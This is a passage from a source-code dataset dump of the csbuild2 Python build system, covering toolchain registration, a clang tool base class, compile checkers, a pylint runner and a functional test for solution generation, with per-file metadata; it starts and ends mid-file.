NotImplementedError()\n\t\treturn \"\"\n\nclass SolutionGenerator(object):\n\t\"\"\"\n\tSolution Generator base class.\n\n\tShares a similarity with tools in that it has a list of input files (in this case, projectExtensions),\n\tbut otherwise, is little more than a wrapper around the GenerateSolution() static method, which will\n\tbe called in an OnBuildFinished hook. Making it a class allows extension via additional\n\tstatic data and methods.\n\t\"\"\"\n\n\t@staticmethod\n\tdef GenerateSolution(outputDir, solutionName, projects):\n\t\t\"\"\"\n\t\tGenerates the actual solution file from the projects generated by each tool.\n\t\tThe actual project objects are passed to the solution generator, allowing the generator to gather information\n\t\tabout the projects themselves, as well as outputs returned from the project generator tools\n\t\t(via project.inputFiles[\".ext\"], which is a list of csbuild._build.input_file.InputFile objects) and\n\t\tdata on the tools (via calling methods and properties on the tool through project.toolchain.Tool(ToolType).Method()\n\t\tor project.toolchain.Tool(ToolType).property)\n\n\t\t:param outputDir: Top-level directory all solution files should be placed into\n\t\t:type outputDir: str\n\t\t:param solutionName: Desired base name of the solution\n\t\t:type solutionName: str\n\t\t:param projects: Set of all built projects\n\t\t:type projects: list[csbuild._build.project.Project]\n\t\t\"\"\"\n\t\tpass\n\nclass CompileChecker(object):\n\t\"\"\"\n\tClass to implement various components of checking whether a file should be recompiled.\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.memo = {} # memo.Memo()\n\n\tdef ShouldRecompile(self, fileValue, baselineValue):\n\t\t\"\"\"\n\t\tGiven a condensed value from all the input files and their dependencies,\n\t\tcheck against the baseline to determine if a recompile should be performed.\n\n\t\t:param fileValue: The condensed value for the file\n\t\t:type fileValue: any\n\t\t:param baselineValue: The baseline retrieved earlier\n\t\t:type baselineValue: any\n\t\t:return: whether or not to recompile the file\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn fileValue > baselineValue\n\n\tdef CondenseRecompileChecks(self, values):\n\t\t\"\"\"\n\t\tCondense a list of values into a single value. For example, in the default, a list of modification\n\t\ttimestamps gets condensed into the most recent modification date.\n\n\t\t:param values: The values collected from GetRecompileValue() for a list of dependencies\n\t\t:type values: list\n\t\t:return: The condensed value\n\t\t:rtype: any\n\t\t\"\"\"\n\t\treturn max(values)\n\n\tdef GetRecompileValue(self, buildProject, inputFile):\n\t\t\"\"\"\n\t\tGet a value to be used to compute recompilability. In the default implementation, this is a last modification date.\n\n\t\t:param buildProject: Project encapsulating the files being built\n\t\t:type buildProject: csbuild._build.project.Project\n\t\t:param inputFile: The file to compute the value for\n\t\t:type inputFile: str\n\t\t:return: The value to be used to compute recompilability\n\t\t:rtype: any\n\t\t\"\"\"\n\t\t_ignore(buildProject)\n\t\treturn os.path.getmtime(inputFile)\n\n\tdef GetDependencies(self, buildProject, inputFile):\n\t\t\"\"\"\n\t\tGet a list of dependencies for a file.\n\n\t\t:param buildProject: Project encapsulating the files being built\n\t\t:type buildProject: csbuild._build.project.Project\n\t\t:param inputFile: The file to check\n\t\t:type inputFile: str\n\t\t:return: List of files to depend on\n\t\t:rtype: list[str]\n\t\t\"\"\"\n\t\t_ignore(inputFile)\n\t\t_ignore(buildProject)\n\t\treturn []\n\n\tdef GetRecompileBaseline(self, buildProject, inputFiles):\n\t\t\"\"\"\n\t\tGet the baseline recompile value, typically the value for the intended output of the file.\n\t\tFor example, with timestamps for a c++ toolchain, this would be the value of the .o/.obj file\n\t\tfor a given .cpp input.\n\n\t\tA return value of None forces a recompile.\n\n\t\t:param buildProject: Project encapsulating the files being built\n\t\t:type buildProject: csbuild._build.project.Project\n\t\t:param inputFiles: List of input files\n\t\t:type inputFiles: ordered_set.OrderedSet[input_file.InputFile]\n\t\t:return: A baseline recompile value, or None to force recompile\n\t\t:rtype: any\n\t\t\"\"\"\n\t\tlastFiles = buildProject.GetLastResult(inputFiles)\n\t\tif lastFiles is not None:\n\t\t\treturn min(\n\t\t\t\t[\n\t\t\t\t\tself.GetRecompileValue(buildProject, outputFile) if os.access(outputFile, os.F_OK) else 0\n\t\t\t\t\tfor outputFile in lastFiles\n\t\t\t\t]\n\t\t\t)\n\t\treturn None\n\n\tdef __deepcopy__(self, copyMemo):\n\t\tcopyMemo[id(self)] = self\n\t\treturn self\n" }, { "alpha_fraction": 0.7426739931106567, "alphanum_fraction": 0.7495421171188354, "avg_line_length": 43.57143020629883, "blob_id": "d6a3940845120af15f7450c502e331cea7536870", "content_id": "fd14c5b303fd4396142d3acfa9a298c7ed9db2c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2184, "license_type": "permissive", "max_line_length": 120, "num_lines": 49, "path": "/csbuild/_testing/run_pylint.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: run_pylint\n\t:synopsis: Local pylint install, pretty much does exactly what the main pylint file does, but doing the same thing here\n\t\t\tand invoking this file directly ensures we run with the right python version (2 or 3) so we can test both\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nif __name__ == \"__main__\":\n\timport os\n\timport sys\n\tfrom pylint import run_pylint\n\n\t# Copied from csbuild._utils because we can't import that before we set environ, and we need this to do that\n\tif sys.version_info[0] >= 3:\n\t\tdef PlatformString(inputStr):\n\t\t\t\"\"\"In the presence of unicode_literals, get an object that is type str in both python2 and python3.\"\"\"\n\t\t\tif isinstance(inputStr, str):\n\t\t\t\treturn inputStr\n\t\t\treturn inputStr.decode(\"UTF-8\")\n\telse:\n\t\tdef PlatformString(inputStr):\n\t\t\t\"\"\"In the presence of unicode_literals, get an object that is type str in both python2 and python3.\"\"\"\n\t\t\tif isinstance(inputStr, str):\n\t\t\t\treturn inputStr\n\t\t\treturn inputStr.encode(\"UTF-8\")\n\n\tos.environ[PlatformString(\"CSBUILD_NO_AUTO_RUN\")] = PlatformString(\"1\")\n\trun_pylint()\n" }, { "alpha_fraction": 0.6566217541694641, "alphanum_fraction": 0.6633623838424683, "avg_line_length": 30.723270416259766, "blob_id": "0e820ba39f984a5fab818858df9aec5f1716741b", "content_id": "143ce8edd2183d5c35360831a5207de4e455cf0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5044, "license_type": "no_license", "max_line_length": 117, "num_lines": 159, "path": "/csbuild/tools/common/clang_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: clang_tool_base\n\t:synopsis: Abstract base class for clang tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport platform\nimport subprocess\n\nfrom abc import ABCMeta\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\nfrom ... import commands\n\n\n_IS_HOST_MAC_OS = platform.system() == \"Darwin\"\n\ndef _ignore(_):\n\tpass\n\ndef _noLogOnRun(shared, msg):\n\t_ignore(shared)\n\t_ignore(msg)\n\n\nclass ClangHostToolInfo(object):\n\t\"\"\"\n\tClass for maintaining data output by clang needed by the build process.\n\t\"\"\"\n\tInstance = None\n\n\tdef __init__(self):\n\t\ttry:\n\t\t\t# Verify the 'clang' program exists.\n\t\t\tsubprocess.call([\"clang\"], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n\t\texcept:\n\t\t\traise IOError(\"Program 'clang' could not be found; please make sure you have it installed on your system\")\n\n\t\t_, targetTriplet, _ = commands.Run([\"clang\", \"-dumpmachine\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\ttargetSegments = targetTriplet.strip().split(\"-\", 1)\n\n\t\tself._nativeTargetPrefix = targetSegments[0] if targetSegments else None\n\t\tself._nativeTargetSuffix = targetSegments[1] if targetSegments and len(targetSegments) > 1 else None\n\n\t@property\n\tdef nativeTargetPrefix(self):\n\t\t\"\"\"\n\t\tReturn the native target triple prefix\n\t\t\"\"\"\n\t\treturn self._nativeTargetPrefix\n\n\t@property\n\tdef nativeTargetSuffix(self):\n\t\t\"\"\"\n\t\tReturn the native target triple suffix\n\t\t\"\"\"\n\t\treturn self._nativeTargetSuffix\n\n\n@MetaClass(ABCMeta)\nclass ClangToolBase(Tool):\n\t\"\"\"\n\tParent class for all tools targeting clang builds.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._clangToolInfo = None\n\n\n\t####################################################################################################################\n\t### Base methods\n\t####################################################################################################################\n\n\tdef _getArchitectureTargetArgs(self, project):\n\t\targs = []\n\n\t\tif _IS_HOST_MAC_OS:\n\t\t\t# Mac needs special handling since some older versions of the Apple Clang compiler have\n\t\t\t# knowledge of the arm64 architecture, but don't support using the target triple for it.\n\t\t\t# However, they all (at the time of this writing) support using the '-arch <arch-name>'\n\t\t\t# command line argument.\n\t\t\tarch = {\n\t\t\t\t\"x64\": \"x86_64\",\n\t\t\t}.get(project.architectureName, project.architectureName)\n\t\t\targs.extend([\"-arch\", arch])\n\n\t\telse:\n\t\t\ttarget = self._getArchTarget(project)\n\n\t\t\tif target:\n\t\t\t\targs.extend([\n\t\t\t\t\t\"-target\", target,\n\t\t\t\t])\n\n\t\treturn args\n\n\tdef _getArchTarget(self, project):\n\t\ttargetPrefix = self._clangToolInfo.nativeTargetPrefix\n\t\ttargetSuffix = self._clangToolInfo.nativeTargetSuffix\n\n\t\tif not targetPrefix or not targetSuffix:\n\t\t\treturn None\n\n\t\t# When necessary fill in the architecture name with something clang expects.\n\t\ttargetPrefix = {\n\t\t\t\"x86\": \"i386\",\n\t\t\t\"x64\": \"x86_64\",\n\t\t\t\"arm\": targetPrefix \\\n\t\t\t\tif targetPrefix.startswith(\"armv\") \\\n\t\t\t\telse \"armv6\",\n\t\t\t\"arm64\": targetPrefix \\\n\t\t\t\tif targetPrefix.startswith(\"aarch64\") \\\n\t\t\t\telse \"aarch64\",\n\t\t}.get(project.architectureName, None)\n\t\tif not targetPrefix:\n\t\t\treturn None\n\n\t\treturn \"{}-{}\".format(targetPrefix, targetSuffix)\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tTool.SetupForProject(self, project)\n\n\t\t# Create the clang tool info if the singleton doesn't already exist.\n\t\tif not ClangHostToolInfo.Instance:\n\t\t\tClangHostToolInfo.Instance = ClangHostToolInfo()\n\n\t\tself._clangToolInfo = ClangHostToolInfo.Instance\n" }, { "alpha_fraction": 0.6632652878761292, "alphanum_fraction": 0.6632652878761292, "avg_line_length": 13, "blob_id": "ca7868146931398736301fa3b784f02780256eb7", "content_id": "745cd1808c946023244d28e58401f67347f520f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 98, "license_type": "no_license", "max_line_length": 28, "num_lines": 7, "path": "/functional_tests/cpp_rpath_test/libhello/libhello.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include \"libhello.hpp\"\n\nvoid goodbye_world()\n{\n\tprintf(\" Goodbye, World!\");\n}\n" }, { "alpha_fraction": 0.7844436168670654, "alphanum_fraction": 0.809225857257843, "avg_line_length": 42.35638427734375, "blob_id": "44580df1c4e652c39edcca9e6987e0790f3a888b", "content_id": "fb3dec17dd4a67438f3ab9af057298606d9af701", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8151, "license_type": "no_license", "max_line_length": 145, "num_lines": 188, "path": "/csbuild/tools/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: tools\n\t:synopsis: Set of built-in tools that ship with csbuild\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport platform\n\nfrom .assemblers import AsmCompileChecker\nfrom .cpp_compilers import CppCompileChecker\n\nfrom .assemblers.android_clang_assembler import AndroidClangAssembler\nfrom .assemblers.android_gcc_assembler import AndroidGccAssembler\nfrom .assemblers.clang_assembler import ClangAssembler\nfrom .assemblers.gcc_assembler import GccAssembler\nfrom .assemblers.msvc_assembler import MsvcAssembler\nfrom .assemblers.msvc_uwp_assembler import MsvcUwpAssembler\nfrom .assemblers.ps3_assembler import Ps3Assembler\nfrom .assemblers.ps4_assembler import Ps4Assembler\nfrom .assemblers.ps5_assembler import Ps5Assembler\nfrom .assemblers.psvita_assembler import PsVitaAssembler\nfrom .assemblers.xbox_360_assembler import Xbox360Assembler\n\nfrom .common.sony_tool_base import Ps3SpuConverter\nfrom .common.xbox_360_tool_base import Xbox360ImageXexTool\n\nfrom .cpp_compilers.android_clang_cpp_compiler import AndroidClangCppCompiler\nfrom .cpp_compilers.android_gcc_cpp_compiler import AndroidGccCppCompiler\nfrom .cpp_compilers.clang_cpp_compiler import ClangCppCompiler\nfrom .cpp_compilers.gcc_cpp_compiler import GccCppCompiler\nfrom .cpp_compilers.mac_os_clang_cpp_compiler import MacOsClangCppCompiler\nfrom .cpp_compilers.msvc_cpp_compiler import MsvcCppCompiler\nfrom .cpp_compilers.msvc_uwp_cpp_compiler import MsvcUwpCppCompiler\nfrom .cpp_compilers.ps3_cpp_compiler import Ps3CppCompiler\nfrom .cpp_compilers.ps4_cpp_compiler import Ps4CppCompiler\nfrom .cpp_compilers.ps5_cpp_compiler import Ps5CppCompiler\nfrom .cpp_compilers.psvita_cpp_compiler import PsVitaCppCompiler\nfrom .cpp_compilers.xbox_360_cpp_compiler import Xbox360CppCompiler\n\nfrom .java_archivers.oracle_java_archiver import OracleJavaArchiver\n\nfrom .java_compilers.oracle_java_compiler import OracleJavaCompiler\n\nfrom .linkers.android_clang_linker import AndroidClangLinker\nfrom .linkers.android_gcc_linker import AndroidGccLinker\nfrom .linkers.clang_linker import ClangLinker\nfrom .linkers.gcc_linker import GccLinker\nfrom .linkers.mac_os_clang_linker import MacOsClangLinker\nfrom .linkers.msvc_linker import MsvcLinker\nfrom .linkers.msvc_uwp_linker import MsvcUwpLinker\nfrom .linkers.ps3_linker import Ps3Linker\nfrom .linkers.ps4_linker import Ps4Linker\nfrom .linkers.ps5_linker import Ps5Linker\nfrom .linkers.psvita_linker import PsVitaLinker\nfrom .linkers.xbox_360_linker import Xbox360Linker\n\nfrom .project_generators.visual_studio import (\n\tVsProjectGenerator,\n\tVsSolutionGenerator2010,\n\tVsSolutionGenerator2012,\n\tVsSolutionGenerator2013,\n\tVsSolutionGenerator2015,\n\tVsSolutionGenerator2017,\n\tVsSolutionGenerator2019,\n\tVsSolutionGenerator2022,\n)\n\nfrom ..toolchain import CompileChecker\n\ndef _createCheckers(inputMappings):\n\tcheckers = {}\n\n\tfor checkerObj, extensions in inputMappings.items():\n\t\tfor ext in extensions:\n\t\t\tcheckers[ext] = checkerObj\n\n\treturn checkers\n\ndef InitTools():\n\t\"\"\"\n\tInitialize the built-in csbuild tools\n\t\"\"\"\n\tsystemArchitecture = csbuild.GetSystemArchitecture()\n\n\t# Get either the platform-specific clang tools or the default clang tools.\n\tclangCompiler, clangLinker = {\n\t\t\"Darwin\": (MacOsClangCppCompiler, MacOsClangLinker),\n\t}.get(platform.system(), (ClangCppCompiler, ClangLinker))\n\n\t# Register C/C++ toolchains.\n\tfor name, compiler, linker, assembler in [\n\t\t( \"gcc\", GccCppCompiler, GccLinker, GccAssembler ),\n\t\t( \"clang\", clangCompiler, clangLinker, ClangAssembler ),\n\t\t( \"msvc\", MsvcCppCompiler, MsvcLinker, MsvcAssembler ),\n\t\t( \"msvc-uwp\", MsvcUwpCppCompiler, MsvcUwpLinker, MsvcUwpAssembler ),\n\t\t( \"mac-clang\", MacOsClangCppCompiler, MacOsClangLinker, ClangAssembler ),\n\t\t( \"android-gcc\", AndroidGccCppCompiler, AndroidGccLinker, AndroidGccAssembler ),\n\t\t( \"android-clang\", AndroidClangCppCompiler, AndroidClangLinker, AndroidClangAssembler ),\n\t]:\n\t\tcheckers = _createCheckers({\n\t\t\tCppCompileChecker(compiler): compiler.inputFiles,\n\t\t\tAsmCompileChecker(assembler): assembler.inputFiles,\n\t\t})\n\n\t\tcsbuild.RegisterToolchain(name, systemArchitecture, compiler, linker, assembler, checkers=checkers)\n\n\t# Register Java toolchains.\n\tfor name, compiler, archiver in [\n\t\t( \"oracle-java\", OracleJavaCompiler, OracleJavaArchiver ),\n\t]:\n\t\tcheckers = _createCheckers({\n\t\t\tCompileChecker(): compiler.inputFiles,\n\t\t})\n\n\t\tcsbuild.RegisterToolchain(name, systemArchitecture, compiler, archiver, checkers=checkers)\n\n\tps3Checkers = _createCheckers({\n\t\tCppCompileChecker(Ps3CppCompiler): Ps3CppCompiler.inputFiles,\n\t\tAsmCompileChecker(Ps3Assembler): Ps3Assembler.inputFiles,\n\t})\n\n\tps4Checkers = _createCheckers({\n\t\tCppCompileChecker(Ps4CppCompiler): Ps4CppCompiler.inputFiles,\n\t\tAsmCompileChecker(Ps4Assembler): Ps4Assembler.inputFiles,\n\t})\n\n\tps5Checkers = _createCheckers({\n\t\tCppCompileChecker(Ps5CppCompiler): Ps5CppCompiler.inputFiles,\n\t\tAsmCompileChecker(Ps5Assembler): Ps5Assembler.inputFiles,\n\t})\n\n\tpsVitaCheckers = _createCheckers({\n\t\tCppCompileChecker(PsVitaCppCompiler): PsVitaCppCompiler.inputFiles,\n\t\tAsmCompileChecker(PsVitaAssembler): PsVitaAssembler.inputFiles,\n\t})\n\n\t# Register the Sony platform toolchains.\n\tcsbuild.RegisterToolchain(\"ps3\", \"cell\", Ps3CppCompiler, Ps3Linker, Ps3Assembler, Ps3SpuConverter, checkers=ps3Checkers)\n\tcsbuild.RegisterToolchain(\"ps4\", \"x64\", Ps4CppCompiler, Ps4Linker, Ps4Assembler, checkers=ps4Checkers)\n\tcsbuild.RegisterToolchain(\"ps5\", \"x64\", Ps5CppCompiler, Ps5Linker, Ps5Assembler, checkers=ps5Checkers)\n\tcsbuild.RegisterToolchain(\"psvita\", \"arm\", PsVitaCppCompiler, PsVitaLinker, PsVitaAssembler, checkers=psVitaCheckers)\n\n\txbox360Checkers = _createCheckers({\n\t\tCppCompileChecker(Xbox360CppCompiler): Xbox360CppCompiler.inputFiles,\n\t\tAsmCompileChecker(Xbox360Assembler): Xbox360Assembler.inputFiles,\n\t})\n\n\t# Register the Xbox platform toolchains.\n\tcsbuild.RegisterToolchain(\"xbox360\", \"xcpu\", Xbox360CppCompiler, Xbox360Linker, Xbox360Assembler, Xbox360ImageXexTool, checkers=xbox360Checkers)\n\n\t# Register toolchain groups.\n\tcsbuild.RegisterToolchainGroup(\"msvc\", \"msvc\", \"msvc-uwp\")\n\tcsbuild.RegisterToolchainGroup(\"gnu\", \"gcc\", \"clang\")\n\tcsbuild.RegisterToolchainGroup(\"android\", \"android-gcc\", \"android-clang\")\n\tcsbuild.RegisterToolchainGroup(\"sony\", \"ps3\", \"ps4\", \"ps5\", \"psvita\")\n\n\t# Register default project generators.\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2010\", [VsProjectGenerator], VsSolutionGenerator2010)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2012\", [VsProjectGenerator], VsSolutionGenerator2012)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2013\", [VsProjectGenerator], VsSolutionGenerator2013)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2015\", [VsProjectGenerator], VsSolutionGenerator2015)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2017\", [VsProjectGenerator], VsSolutionGenerator2017)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2019\", [VsProjectGenerator], VsSolutionGenerator2019)\n\tcsbuild.RegisterProjectGenerator(\"visual-studio-2022\", [VsProjectGenerator], VsSolutionGenerator2022)\n" }, { "alpha_fraction": 0.737864077091217, "alphanum_fraction": 0.7424328923225403, "avg_line_length": 39.252872467041016, "blob_id": "77f02a1384cfb3d9e181c1a9a691f4b0a84aa8d0", "content_id": "cb8f6c859b800574d89c5f07ba11261073f2fe9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3502, "license_type": "no_license", "max_line_length": 131, "num_lines": 87, "path": "/functional_tests/project_generator_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of tools to make sure simple tools chain together properly\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport shutil\n\nfrom csbuild._testing.functional_test import FunctionalTest\n\nclass SolutionGenerationTest(FunctionalTest):\n\t\"\"\"Basic tool test\"\"\"\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tFunctionalTest.setUp(self, cleanAtEnd=False)\n\n\tdef tearDown(self):\n\t\tshutil.rmtree(\"./Solutions\")\n\t\tFunctionalTest.tearDown(self)\n\n\t# pylint: disable=invalid-name\n\tdef testSolutionGenerationWorks(self):\n\t\t\"\"\"Basic solution generation test\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--generate-solution\", \"DummyGenerator\", \"--all-targets\")\n\n\t\ttargets = [\"debug\", \"fastdebug\", \"release\"]\n\n\t\tself.assertFileExists(\"./Solutions/DummyGenerator/csbuild.sln\")\n\t\twith open(\"./Solutions/DummyGenerator/csbuild.sln\") as f:\n\t\t\tcontents = f.read()\n\n\t\tfor target in targets:\n\t\t\texpectedContents = os.path.abspath(\"./Solutions/DummyGenerator/Foo_{}.proj\".format(target))\n\t\t\tself.assertIn(expectedContents, contents)\n\n\t\tfor target in targets:\n\t\t\tprojectFile = \"./Solutions/DummyGenerator/Foo_{}.proj\".format(target)\n\t\t\tself.assertFileExists(projectFile)\n\t\t\twith open(projectFile) as f:\n\t\t\t\tcontents = f.read().splitlines()\n\t\t\tfor i in range(1, 11):\n\t\t\t\tself.assertIn(os.path.abspath(\"./firsts/{}.first\".format(i)), contents)\n\n\t\t\tself.assertFileDoesNotExist(\"./out/Foo.third\")\n\t\t\tfor i in range(1, 11):\n\t\t\t\tself.assertFileDoesNotExist(\"./intermediate/{}.second\".format(i))\n\n\tdef testCleanDoesntRemoveSolutionDir(self):\n\t\t\"\"\"Tests that cleaning doesn't delete solution files\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--generate-solution\", \"DummyGenerator\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--clean\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--generate-solution\", \"DummyGenerator\", \"--clean\")\n\n\t\tself.assertFileContents(\"./Solutions/DummyGenerator/csbuild.sln\", os.path.abspath(\"./Solutions/DummyGenerator/Foo_release.proj\"))\n\n\t\tself.assertFileExists(\"./Solutions/DummyGenerator/Foo_release.proj\")\n\t\twith open(\"./Solutions/DummyGenerator/Foo_release.proj\") as f:\n\t\t\tcontents = f.read().splitlines()\n\t\tfor i in range(1, 11):\n\t\t\tself.assertIn(os.path.abspath(\"./firsts/{}.first\".format(i)), contents)\n\n\t\tself.assertFileDoesNotExist(\"./out/Foo.third\")\n\t\tfor i in range(1, 11):\n\t\t\tself.assertFileDoesNotExist(\"./intermediate/{}.second\".format(i))\n" }, { "alpha_fraction": 0.6815871000289917, "alphanum_fraction": 0.6871654391288757, "avg_line_length": 36.29697799682617, "blob_id": "eaf79c960d4629bfbaf9aadb07a916afcea87763", "content_id": "5b4178d6003b57d8864977d113470cfe9ad37312", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22229, "license_type": "no_license", "max_line_length": 166, "num_lines": 596, "path": "/csbuild/_utils/decorators.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: decorators\n\t:synopsis: Helpful utility decorators\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport warnings\n\nfrom . import StrType\nfrom .._testing import testcase\nfrom .. import perf_timer\n\nif sys.version_info[0] >= 3:\n\t_typeType = type\n\t_classType = type\nelse:\n\timport types\n\t# pylint: disable=invalid-name\n\t_typeType = types.TypeType\n\t_classType = 